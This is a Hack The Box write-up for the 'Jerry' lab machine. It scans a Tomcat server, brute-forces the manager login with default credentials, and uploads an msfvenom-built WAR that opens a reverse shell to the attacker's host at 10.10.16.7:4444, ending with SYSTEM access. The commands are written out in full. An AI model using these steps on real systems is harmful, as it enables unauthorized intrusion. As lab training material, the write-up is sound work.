Contents

🕵 HTB-Writeup : JERRY

Recon

nmap

With nmap we found only one open port (8080). We identify a tomcat server.

1
2
3
4
5
6
7
8
9
nmap -A 

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

nmap --script "vuln"

gobuster

With gobuster, we discover some directory. /manager point to the tomcat manage service. We are asked for credentials while go on the page.

1
2
3
4
5
6
7
8
gobuster -u http://10.10.10.95:8080 -w gobuster-wordlist.txt -t 10 

=====================================================
/docs (Status: 302)
/manager (Status: 302)
/examples (Status: 302)
/index.jsp (Status: 200)
=====================================================

Vulnerabilities

We try to connect to http://10.10.10.95:8080/manager/html. In burp, we intercept the request.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
GET /manager/html HTTP/1.1
Host: 10.10.10.95:8080
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Y291Y291  <----- credentials
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

We identify the token Authorization: Basic YWRtaW46Y291Y291. It’s base64 encoded credentials. This value is equal to admin:coucou. We then try to bruteforce the authentication with default tomcat credentials. I found a list on this github.

Again in burp, we send the request in the Intruder then we launch the attack with our payloads.

drawing

Set our payloads position

One of the credentials work!

drawing

We get a response from one payload

We are able to connect to the manager page with those creds: tomcat:s3cret

More easily, it possible to use the scanner/http/tomcat_mgr_login module on metasploit. This module allows us to test all Tomcat default credentials.

Exploit

We are welcome on the manager page. We can see a war upload module one the page.

drawing

Screenshot of the welcome page

It is possible, thanks to msfvenom to build a malicious war file that will be able to spawn a reverse shell.

We try first the java/shell_reverse_tcp module to build the war.

1
msfvenom -p java/shell_reverse_tcp lhost=10.10.16.7 lport=4444 -f war -o pwn.war

Then, we upload the war file on the server. We can see the application on the list.

drawing

Screenshot of applications list

We listen on the 4444 port (nc -lvnp 4444) while going to the /pwn page just uploaded.

1
2
3
C:\>whoami
whoami
nt authority\system

We got our first and NT Authority prompt!

We can get both flag on the Administrator desktop.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,774,016 bytes free

C:\Users\Administrator\Desktop\flags>type *

user.txt
7004****************************
root.txt
04a8*****************************

Tags

Easy, External, Tomcat, Penetration Tester Level 1, Remote Code Execution, A05:2021-Security Misconfiguration, Default Credentials, Malicious WAR File Upload